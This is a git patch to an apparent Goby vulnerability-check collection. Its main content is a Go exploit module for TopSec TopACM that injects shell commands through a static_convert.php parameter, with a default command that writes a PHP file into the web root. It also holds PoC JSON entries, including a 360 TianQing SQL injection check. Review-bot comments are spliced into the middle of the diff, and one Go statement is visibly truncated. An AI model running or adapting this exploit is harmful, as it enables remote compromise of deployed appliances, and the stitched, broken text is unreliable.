From 49d3b9c637981ac4a15c55ca1a32be67445f3d84 Mon Sep 17 00:00:00 2001 
From: test Date: Wed, 30 Nov 2022 12:20:28 +0000 Subject: [PATCH] auto --- README.md | 2 +- go/TopSec_TopACM_Remote_Command_Execution.go | 152 +++--- go/poc.go | 373 ++------------ json/360_TianQing_ccid_SQL_injectable.json | 69 ++- ...nqing_database_information_disclosure.json | 67 ++- json/Active_UC_index.action_RCE.json | 53 +- ...Alibaba_Nacos_Add_user_not_authorized.json | 69 ++- json/Alibaba_Nacos_Default_password.json | 65 ++- json/Apache_Airflow_Unauthorized.json | 53 +- ...Apache_Kylin_Console_Default_password.json | 61 ++- ...Unauthorized_configuration_disclosure.json | 53 +- json/Apache_Solr_Arbitrary_File_Read.json | 308 ++++++------ json/Aspcms_Backend_Leak.json | 12 +- ...fluence_OGNL_injection_CVE_2021_26084.json | 455 +++++++++++++++++- json/Cacti_Weathermap_File_Write.json | 14 +- json/ClickHouse_SQLI.json | 53 +- json/Consul_Rexec_RCE.json | 49 +- json/Datang_AC_Default_Password.json | 14 +- json/DedeCMS_Carbuyaction_FileInclude.json | 49 +- json/Discuz_RCE_WOOYUN_2010_080723.json | 53 +- json/Discuz_Wechat_Plugins_Unauth.json | 53 +- json/Discuz_v72_SQLI.json | 53 +- json/Docker_Registry_API_Unauth.json | 51 +- json/Fastmeeting_Arbitrary_File_Read.json | 14 +- ...ineReport_v9_Arbitrary_File_Overwrite.json | 51 +- json/GitLab_SSRF_CVE_2021_22214.json | 99 ++-- json/H3C_IMC_RCE.json | 52 +- ...000_Smart_station_Unauthorized_access.json | 63 +-- json/IceWarp_WebClient_basic_RCE.json | 53 +- ...ed_Abritrary_File_Read_CVE_2021_21402.json | 90 +--- json/Jitong_EWEBS_phpinfo_leak.json | 62 ++- json/Konga_Default_JWT_KEY.json | 12 +- ...oxy_Directory_traversal_CVE_2021_3019.json | 121 ++--- json/OpenSNS_RCE.json | 48 +- json/RuoYi_Druid_Unauthorized_access.json | 63 ++- json/Samsung_WLAN_AP_WEA453e_RCE.json | 82 +++- json/Samsung_WLAN_AP_wea453e_router_RCE.json | 253 +++++++--- json/Security_Devices_Hardcoded_Password.json | 14 +- json/SonarQube_unauth_CVE_2020_27986.json | 52 +- ...tions_Manager_API_SSRF_CVE_2021_21975.json | 31 +- 
...re_vCenter_v7.0.2_Arbitrary_File_Read.json | 6 +- json/Weaver_OA_8_SQL_injection.json | 28 +- json/YAPI_RCE.json | 54 ++- json/alibaba_canal_default_password.json | 26 +- json/content.json | 1 + ...ahuo100_sql_injection_CNVD_2021_30193.json | 28 +- 46 files changed, 2152 insertions(+), 1332 deletions(-) create mode 100644 json/content.json diff --git a/README.md b/README.md index 0857fe3..4856e4c 100644 --- a/README.md +++ b/README.md @@ -2,4 +2,4 @@ | 文件类型 | 数量 | | :----:| :----: | | .go | 79 | -| .json | 862 | \ No newline at end of file +| .json | 863 | \ No newline at end of file diff --git a/go/TopSec_TopACM_Remote_Command_Execution.go b/go/TopSec_TopACM_Remote_Command_Execution.go index ab95cac..03960d9 100644 --- a/go/TopSec_TopACM_Remote_Command_Execution.go +++ b/go/TopSec_TopACM_Remote_Command_Execution.go @@ -1,77 +1,77 @@ -package exploits - -import ( - "git.gobies.org/goby/goscanner/goutils" - "git.gobies.org/goby/goscanner/jsonvul" - "git.gobies.org/goby/goscanner/scanconfig" - "git.gobies.org/goby/httpclient" - "net/url" - "strings" -) - -func init() { - expJson := `{"Name":"TopSec TopACM Remote Command Execution","Description":"

Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

","Product":"TopSec-TopACM","Homepage":"https://www.topsec.com.cn/product/27.html","DisclosureDate":"2022-07-28","Author":"su18@javaweb.org","FofaQuery":"body=\"ActiveXObject\" && body=\"name=\\\"dkey_login\\\" \" && body=\"repeat-x left top\"","GobyQuery":"body=\"ActiveXObject\" && body=\"name=\\\"dkey_login\\\" \" && body=\"repeat-x left top\"","Level":"3","Impact":"

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

","Recommendation":"

At present, the manufacturer has not released a security patch. Please pay attention to the official update.https://www.topsec.com.cn/product/27.html

","References":["https://mp.weixin.qq.com/s/5UMEIrDiG5hQFofByYH78g"],"Is0day":false,"HasExp":true,"ExpParams":[{"name":"cmd","type":"input","value":"echo%20PD9waHAgcGhwaW5mbygpOw==%20|base64%20-d%20%3E/var/www/html/3.php","show":""}],"ExpTips":{"Type":"","Content":""},"ScanSteps":["AND",{"Request":{"method":"GET","uri":"/test.php","follow_redirect":false,"header":[],"data_type":"text","data":""},"ResponseTest":{"type":"group","operation":"AND","checks":[{"type":"item","variable":"$code","operation":"==","value":"200","bz":""},{"type":"item","variable":"$body","operation":"contains","value":"test","bz":""}]},"SetVariable":[]}],"ExploitSteps":["AND",{"Request":{"method":"GET","uri":"/test.php","follow_redirect":true,"header":[],"data_type":"text","data":""},"ResponseTest":{"type":"group","operation":"AND","checks":[{"type":"item","variable":"$code","operation":"==","value":"200","bz":""},{"type":"item","variable":"$body","operation":"contains","value":"test","bz":""}]},"SetVariable":[]}],"Tags":["Command Execution"],"VulType":["Command Execution"],"CVEIDs":[""],"CNNVD":[""],"CNVD":[""],"CVSSScore":"9.8","Translation":{"CN":{"Name":"天融信上网行为管理系统命令执行","Product":"天融信-上网行为管理系统","Description":"

天融信上网行为管理系统(TopACM)综合考虑各行业客户需求,为客户提供安全策略、链路负载、身份认证、流量管理、行为管控、上网审计、日志追溯、网监对接、用户行为分析、VPN等实用功能。产品具有良好的网络适应性并满足《网络安全法》、公安部151号令、等保2.0等关于用户行为审计和日志留存的相关要求。目前产品广泛应用于政府、教育、能源、企业、运营商等各类行业,协助客户规范网络、提高工作效率、挖掘数据价值。

天融信上网行为管理系统存在任意命令执行漏洞,攻击者可以在系统上执行任意命令,写入文件,获取webshell,读取敏感信息。

","Recommendation":"

目前厂商还未发布安全补丁,请关注官方更新。https://www.topsec.com.cn/product/27.html

","Impact":"

天融信上网行为管理系统存在任意命令执行漏洞,攻击者可以在系统上执行任意命令,写入文件,获取webshell,读取敏感信息。

","VulType":["命令执⾏"],"Tags":["命令执⾏"]},"EN":{"Name":"TopSec TopACM Remote Command Execution","Product":"TopSec-TopACM","Description":"

Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

","Recommendation":"

At present, the manufacturer has not released a security patch. Please pay attention to the official update.https://www.topsec.com.cn/product/27.html

","Impact":"

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

","VulType":["Command Execution"],"Tags":["Command Execution"]}},"AttackSurfaces":{"Application":null,"Support":null,"Service":null,"System":null,"Hardware":null}}` - - exploitTopACM092348783482 := func(cmd string, host *httpclient.FixUrl) bool { - // 攻击 URL - requestConfig := httpclient.NewGetRequestConfig("/view/IPV6/naborTable/static_convert.php?blocks[0]=|%20" + url.QueryEscape(cmd)) - requestConfig.VerifyTls = false - requestConfig.FollowRedirect = false - requestConfig.Timeout = 15 - - // 发送攻击请求 - if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { - if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "ip -6 neigh del") { - return true - } - } - return false - } - - checkExistFileTopACM092348783482 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool { - // 攻击 URL - requestConfig := httpclient.NewGetRequestConfig("/" + fileName + ".php") - requestConfig.VerifyTls = false - requestConfig.FollowRedirect = false - requestConfig.Timeout = 15 - - // 发送攻击请求 - if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { - if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, fileContent) { - return true - } - } - return false - } - - ExpManager.AddExploit(NewExploit( - goutils.GetFileName(), - expJson, - func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { - - // 生成随机文件名 - randomFileName := goutils.RandomHexString(6) - - // 漏洞攻击包,POC 使用自删除的文件 - // /var/www/html/"+randomFileName+".php", u) { - return checkExistFileTopACM092348783482(randomFileName, "e165421110ba03099a1c0393373c5b43", u) - } - - return false - }, - func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { - - cmd := ss.Params["cmd"].(string) - - if exploitTopACM092348783482(cmd, expResult.HostInfo) { - expResult.Success = true - expResult.Output = "命令执行成功" - } - - return expResult - }, - )) -} - +package exploits + +import ( + 
"git.gobies.org/goby/goscanner/goutils" + "git.gobies.org/goby/goscanner/jsonvul" + "git.gobies.org/goby/goscanner/scanconfig" + "git.gobies.org/goby/httpclient" + "net/url" + "strings" +) + +func init() { + expJson := `{"Name":"TopSec TopACM Remote Command Execution","Description":"

Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

","Product":"TopSec-TopACM","Homepage":"https://www.topsec.com.cn/product/27.html","DisclosureDate":"2022-07-28","Author":"su18@javaweb.org","FofaQuery":"body=\"ActiveXObject\" && body=\"name=\\\"dkey_login\\\" \" && body=\"repeat-x left top\"","GobyQuery":"body=\"ActiveXObject\" && body=\"name=\\\"dkey_login\\\" \" && body=\"repeat-x left top\"","Level":"3","Impact":"

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

","Recommendation":"

At present, the manufacturer has not released a security patch. Please pay attention to the official update.https://www.topsec.com.cn/product/27.html

","References":["https://mp.weixin.qq.com/s/5UMEIrDiG5hQFofByYH78g"],"Is0day":false,"HasExp":true,"ExpParams":[{"name":"cmd","type":"input","value":"echo%20PD9waHAgcGhwaW5mbygpOw==%20|base64%20-d%20%3E/var/www/html/3.php","show":""}],"ExpTips":{"Type":"","Content":""},"ScanSteps":["AND",{"Request":{"method":"GET","uri":"/test.php","follow_redirect":false,"header":[],"data_type":"text","data":""},"ResponseTest":{"type":"group","operation":"AND","checks":[{"type":"item","variable":"$code","operation":"==","value":"200","bz":""},{"type":"item","variable":"$body","operation":"contains","value":"test","bz":""}]},"SetVariable":[]}],"ExploitSteps":["AND",{"Request":{"method":"GET","uri":"/test.php","follow_redirect":true,"header":[],"data_type":"text","data":""},"ResponseTest":{"type":"group","operation":"AND","checks":[{"type":"item","variable":"$code","operation":"==","value":"200","bz":""},{"type":"item","variable":"$body","operation":"contains","value":"test","bz":""}]},"SetVariable":[]}],"Tags":["Command Execution"],"VulType":["Command Execution"],"CVEIDs":[""],"CNNVD":[""],"CNVD":[""],"CVSSScore":"9.8","Translation":{"CN":{"Name":"天融信上网行为管理系统命令执行","Product":"天融信-上网行为管理系统","Description":"

天融信上网行为管理系统(TopACM)综合考虑各行业客户需求,为客户提供安全策略、链路负载、身份认证、流量管理、行为管控、上网审计、日志追溯、网监对接、用户行为分析、VPN等实用功能。产品具有良好的网络适应性并满足《网络安全法》、公安部151号令、等保2.0等关于用户行为审计和日志留存的相关要求。目前产品广泛应用于政府、教育、能源、企业、运营商等各类行业,协助客户规范网络、提高工作效率、挖掘数据价值。

天融信上网行为管理系统存在任意命令执行漏洞,攻击者可以在系统上执行任意命令,写入文件,获取webshell,读取敏感信息。

","Recommendation":"

目前厂商还未发布安全补丁,请关注官方更新。https://www.topsec.com.cn/product/27.html

","Impact":"

天融信上网行为管理系统存在任意命令执行漏洞,攻击者可以在系统上执行任意命令,写入文件,获取webshell,读取敏感信息。

","VulType":["命令执⾏"],"Tags":["命令执⾏"]},"EN":{"Name":"TopSec TopACM Remote Command Execution","Product":"TopSec-TopACM","Description":"

Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

","Recommendation":"

At present, the manufacturer has not released a security patch. Please pay attention to the official update.https://www.topsec.com.cn/product/27.html

","Impact":"

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

","VulType":["Command Execution"],"Tags":["Command Execution"]}},"AttackSurfaces":{"Application":null,"Support":null,"Service":null,"System":null,"Hardware":null}}` + + exploitTopACM092348783482 := func(cmd string, host *httpclient.FixUrl) bool { + // 攻击 URL + requestConfig := httpclient.NewGetRequestConfig("/view/IPV6/naborTable/static_convert.php?blocks[0]=|%20" + url.QueryEscape(cmd)) + requestConfig.VerifyTls = false + requestConfig.FollowRedirect = false + requestConfig.Timeout = 15 + + // 发送攻击请求 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { + if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "ip -6 neigh del") { + return true + } + } + return false + } + + checkExistFileTopACM092348783482 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool { + // 攻击 URL + requestConfig := httpclient.NewGetRequestConfig("/" + fileName + ".php") + requestConfig.VerifyTls = false + requestConfig.FollowRedirect = false + requestConfig.Timeout = 15 + + // 发送攻击请求 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { + if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, fileContent) { + return true + } + } + return false + } + + ExpManager.AddExploit(NewExploit( + goutils.GetFileName(), + expJson, + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { + + // 生成随机文件名 + randomFileName := goutils.RandomHexString(6) + + // 漏洞攻击包,POC 使用自删除的文件 + // /var/www/html/"+randomFileName+".php", u) { + return checkExistFileTopACM092348783482(randomFileName, "e165421110ba03099a1c0393373c5b43", u) + } + + return false + }, + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { + + cmd := ss.Params["cmd"].(string) + + if exploitTopACM092348783482(cmd, expResult.HostInfo) { + expResult.Success = true + expResult.Output = "命令执行成功" + } + + return expResult + }, + )) +} + // https://heiwado.cn:8443/ \ No newline at end of file 
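Review bot: The comment line `// /var/www/html/"+randomFileName+".php", u) {` on the re-added side reads like the tail of a truncated `if` statement: as shown, the following `return checkExistFileTopACM092348783482(...)` is unconditional, the next `}` closes the scan callback early and `return false` becomes unreachable, so the file would not compile as written — if this is a paste artefact rather than the committed text, ignore it, otherwise restore the statement from the original source. Apart from that, all 77 lines are removed and re-added with identical content, which looks like line-ending churn; a `.gitattributes` rule normalising line endings would keep the history readable. The only real addition, a trailing `// https://…` comment holding a bare host URL with no newline at end of file, looks like a scratch note and should be dropped. In the re-added exploit callback, `cmd := ss.Params["cmd"].(string)` panics when the parameter is missing or not a string; use `cmd, ok := ss.Params["cmd"].(string)` followed by `if !ok { return expResult }` before calling the helper.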
diff --git a/go/poc.go b/go/poc.go
index 9ef1440..ed5d654 100644
--- a/go/poc.go
+++ b/go/poc.go
@@ -1,332 +1,53 @@ -package goby +package gobypoc -import ( - "encoding/json" - "github.com/niudaii/zpscan/internal/utils" - "github.com/niudaii/zpscan/pkg/pocscan/cel/proto" - "io/ioutil" - "strconv" - "strings" -) - -type Poc struct { - Name string `json:"Name"` - Description string `json:"Description"` - Product string `json:"Product"` - Homepage string `json:"Homepage"` - DisclosureDate string `json:"DisclosureDate"` - Author string `json:"Author"` - FofaQuery string `json:"FofaQuery"` - GobyQuery string `json:"GobyQuery"` - Level string `json:"Level"` - Impact string `json:"Impact"` - VulType []interface{} `json:"VulType"` - CVEIDs []interface{} `json:"CVEIDs"` - CNNVD []interface{} `json:"CNNVD"` - CNVD []interface{} `json:"CNVD"` - CVSSScore string `json:"CVSSScore"` - Is0Day bool `json:"Is0day"` - Recommendation string `json:"Recommendation"` - Translation struct { - CN struct { - Name string `json:"Name"` - Product string `json:"Product"` - Description string `json:"Description"` - Recommendation string `json:"Recommendation"` - Impact string `json:"Impact"` - VulType []interface{} `json:"VulType"` - Tags []interface{} `json:"Tags"` - } `json:"CN"` - EN struct { - Name string `json:"Name"` - Product string `json:"Product"` - Description string `json:"Description"` - Recommendation string `json:"Recommendation"` - Impact string `json:"Impact"` - VulType []interface{} `json:"VulType"` - Tags []interface{} `json:"Tags"` - } `json:"EN"` - } `json:"Translation"` - References []string `json:"References"` - HasExp bool `json:"HasExp"` - ExpParams interface{} `json:"ExpParams"` - ExpTips struct { - Type string `json:"Type"` - Content string `json:"Content"` - } `json:"ExpTips"` - ScanSteps []interface{} `json:"ScanSteps"` - ExploitSteps interface{} `json:"ExploitSteps"` - Tags interface{} `json:"Tags"` - AttackSurfaces struct { - Application interface{} `json:"Application"` - Support interface{} `json:"Support"` - Service interface{} `json:"Service"` - System 
interface{} `json:"System"` - Hardware interface{} `json:"Hardware"` - } `json:"AttackSurfaces"` -} - -type Rule struct { - Request struct { - Data string `json:"data"` - DataType string `json:"data_type"` - FollowRedirect bool `json:"follow_redirect"` - Header map[string]string `json:"header"` - Method string `json:"method"` - Uri string `json:"uri"` - } `json:"Request"` - ResponseTest struct { - Checks []Checks `json:"checks"` - Operation string `json:"operation"` - Type string `json:"type"` - } `json:"ResponseTest"` - SetVariable []interface{} `json:"SetVariable"` -} - -type Checks struct { - Bz string `json:"bz"` - Operation string `json:"operation"` +type Check struct { Type string `json:"type"` - Value string `json:"value"` Variable string `json:"variable"` + Operation string `json:"operation"` + Value string `json:"value"` + Bz string `json:"bz"` +} +type ResponseTest struct { + Type string `json:"type"` + Operation string `json:"operation"` + Checks []Check `json:"checks"` +} +type Request struct { + Method string `json:"method"` + Uri string `json:"uri"` + FollowRedirect bool `json:"follow_redirect"` + Header map[string]string `json:"header"` + DataType string `json:"data_type"` + Data string `json:"data"` + SetVariable []string `json:"set_variable"` +} +type ScanStep struct { + Requests Request + ResponseTest ResponseTest + SetVariable []string } -// LoadAllPoc 加载全部poc -func LoadAllPoc(pocDir string) (pocs []*Poc, err error) { - var pocPathList []string - pocPathList, err = utils.GetAllFile(pocDir) - if err != nil { - return - } - for _, pocPath := range pocPathList { - if !strings.HasSuffix(pocPath, ".json") { - continue - } - var poc Poc - var bytes []byte - bytes, err = ioutil.ReadFile(pocPath) - if err != nil { - return - } - err = json.Unmarshal(bytes, &poc) - if err != nil { - return - } - pocs = append(pocs, &poc) - } - return -} - -// CheckResult checks -func (r *Rule) CheckResult(preq *proto.Response) bool { - var result []bool - var result1 bool 
- for _, check := range r.ResponseTest.Checks { - result1 = CheckOperation(check, preq) - result = append(result, result1) - } - if r.ResponseTest.Operation == "AND" { - for _, res := range result { - if !res { - return false - } - } - return true - } else if r.ResponseTest.Operation == "OR" { - for _, res := range result { - if res { - return true - } - } - } - return false -} - -// CheckOperation operation -func CheckOperation(check Checks, preq *proto.Response) bool { - switch { - case strings.EqualFold(check.Operation, "contains"): - { - if check.Variable == "$body" { - if strings.Contains(string(preq.Body), check.Value) { - return true - } - } else if check.Variable == "$head" { - for _, header := range preq.Headers { - if strings.Contains(header, check.Value) { - return true - } - } - } else if check.Variable == "$code" { - if strings.Contains(strconv.Itoa(int(preq.Status)), check.Value) { - return true - } - } - } - case strings.EqualFold(check.Operation, "not contains"): - { - if check.Variable == "$body" { - if !(strings.Contains(string(preq.Body), check.Value)) { - return true - } - } else if check.Variable == "$head" { - for _, header := range preq.Headers { - if !(strings.Contains(header, check.Value)) { - return true - } - } - } else if check.Variable == "$code" { - if !(strings.Contains(strconv.Itoa(int(preq.Status)), check.Value)) { - return true - } - } - } - case strings.EqualFold(check.Operation, "start_with"): - { - if check.Variable == "$body" { - if strings.HasPrefix(string(preq.Body), check.Value) { - return true - } - } else if check.Variable == "$head" { - for _, header := range preq.Headers { - if strings.HasPrefix(header, check.Value) { - return true - } - } - } else if check.Variable == "$code" { - if strings.HasPrefix(strconv.Itoa(int(preq.Status)), check.Value) { - return true - } - } - } - case strings.EqualFold(check.Operation, "end_with"): - { - if check.Variable == "$body" { - if strings.HasSuffix(string(preq.Body), check.Value) { - 
return true - } - } else if check.Variable == "$head" { - for _, header := range preq.Headers { - if strings.HasSuffix(header, check.Value) { - return true - } - } - } else if check.Variable == "$code" { - if strings.HasSuffix(strconv.Itoa(int(preq.Status)), check.Value) { - return true - } - } - } - case strings.EqualFold(check.Operation, "=="): - { - if check.Variable == "$body" { - if check.Value == string(preq.Body) { - return true - } - } else if check.Variable == "$head" { - for _, header := range preq.Headers { - if check.Value == header { - return true - } - } - } else if check.Variable == "$code" { - if check.Value == strconv.Itoa(int(preq.Status)) { - return true - } - } - } - case strings.EqualFold(check.Operation, "!="): - { - if check.Variable == "$body" { - if check.Value != string(preq.Body) { - return true - } - } else if check.Variable == "$head" { - for _, header := range preq.Headers { - if check.Value != header { - return true - } - } - } else if check.Variable == "$code" { - if check.Value != strconv.Itoa(int(preq.Status)) { - return true - } - } - } - case strings.EqualFold(check.Operation, ">"): - { - if check.Variable == "$body" { - if check.Value > string(preq.Body) { - return true - } - } else if check.Variable == "$head" { - for _, header := range preq.Headers { - if check.Value > header { - return true - } - } - } else if check.Variable == "$code" { - if check.Value > strconv.Itoa(int(preq.Status)) { - return true - } - } - } - case strings.EqualFold(check.Operation, "<"): - { - if check.Variable == "$body" { - if check.Value < string(preq.Body) { - return true - } - } else if check.Variable == "$head" { - for _, header := range preq.Headers { - if check.Value < header { - return true - } - } - } else if check.Variable == "$code" { - if check.Value < strconv.Itoa(int(preq.Status)) { - return true - } - } - } - case strings.EqualFold(check.Operation, ">="): - { - if check.Variable == "$body" { - if check.Value >= string(preq.Body) { - 
return true - } - } else if check.Variable == "$head" { - for _, header := range preq.Headers { - if check.Value >= header { - return true - } - } - } else if check.Variable == "$code" { - if check.Value >= strconv.Itoa(int(preq.Status)) { - return true - } - } - } - case strings.EqualFold(check.Operation, "<="): - { - if check.Variable == "$body" { - if check.Value <= string(preq.Body) { - return true - } - } else if check.Variable == "$head" { - for _, header := range preq.Headers { - if check.Value <= header { - return true - } - } - } else if check.Variable == "$code" { - if check.Value <= strconv.Itoa(int(preq.Status)) { - return true - } - } - } - default: - return false - } - return false +type PocJson struct { + Name string `json:"Name"` + Level string `json:"Level"` + Tags []string `json:"Tags"` + Query string `json:"GobyQuery"` + Description string `json:"Description"` + Product string `json:"Product"` + Homepage string `json:"Homepage"` + Author string `json:"Author"` + Impact string `json:"Impact"` + Recommandation string `json:"Recommandation"` + References []string `json:"References"` + HasExp bool `json:"HasExp"` + ExpParams []struct { + Name string `json:"name"` + Type string `json:"type"` + Value string `json:"value"` + Show string `json:"show"` + } `json:"ExpParams"` + ScanSteps []interface{} `json:"ScanSteps"` + ExploitSteps []interface{} `json:"ExploitSteps"` + PostTime string `json:"PostTime"` + Version string `json:"GobyVersion"` } diff --git a/json/360_TianQing_ccid_SQL_injectable.json b/json/360_TianQing_ccid_SQL_injectable.json index d1e079b..779eaec 100644 --- a/json/360_TianQing_ccid_SQL_injectable.json +++ b/json/360_TianQing_ccid_SQL_injectable.json 
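Review bot: `ScanStep.Requests` carries no json tag and is spelled in the plural, while the step objects in this commit's JSON files use the key `"Request"`; encoding/json matches field names case-insensitively but will not match `Requests` against `Request`, so that field would never be populated. `PocJson.Recommandation` has the same problem: its tag is `json:"Recommandation"`, but the JSON files changed in this very commit rename that key to `"Recommendation"`, so the value is silently dropped. Note also that every `ScanSteps`/`ExploitSteps` array begins with the string `"AND"` before the step objects, which is presumably why they are decoded as `[]interface{}`; `ScanStep` is not referenced anywhere in this hunk, so if nothing else uses it yet the rename below is safe, otherwise keep the Go field names and change only the tags. The new package name `gobypoc` also lacks a package comment.
```go
type ScanStep struct {
	Request      Request      `json:"Request"`
	ResponseTest ResponseTest `json:"ResponseTest"`
	SetVariable  []string     `json:"SetVariable"`
}

// … unchanged: Check, ResponseTest, Request …

type PocJson struct {
	// … unchanged: Name … Impact …
	Recommendation string `json:"Recommendation"`
	// … unchanged: References … Version …
}
```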
@@ -1,17 +1,23 @@ { "Name": "360 TianQing ccid SQL injectable", "Level": "2", - "Tags": [], - "GobyQuery": "app=\"360-TianQing\"", - "Description": "The attacker can get the server permission by injecting SQL into the upload Trojan", - "Product": "360 TianQing", - "Homepage": "htp://360.cn", - "Author": "PeiQi", - "Impact": "

The attacker can get the server permission by injecting SQL into the upload Trojan

", - "Recommandation": "", - "References": [ - "http://wiki.peiqi.tech" + "Tags": [ + "sqli" ], + "GobyQuery": "app=\"360-TianQing\"", + "Description": "", + "Product": "360 TianQing", + "Homepage": "https://360.net/product-center/Endpoint-Security/management-system", + "Author": "", + "Impact": "The attacker can get the server permission by injecting SQL into the upload Trojan.", + "Recommendation": "update", + "References": [], + "HasExp": true, + "ExpParams": null, + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -19,7 +25,7 @@ "method": "GET", "uri": "/api/dp/rptsvcsyncpoint?ccid=1", "follow_redirect": true, - "header": {}, + "header": null, "data_type": "text", "data": "" }, @@ -60,6 +66,43 @@ "SetVariable": [] } ], - "PostTime": "2021-04-09 08:51:50", - "GobyVersion": "1.8.255" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/360_Tianqing_database_information_disclosure.json b/json/360_Tianqing_database_information_disclosure.json index 1634515..382ad74 100644 --- a/json/360_Tianqing_database_information_disclosure.json +++ b/json/360_Tianqing_database_information_disclosure.json 
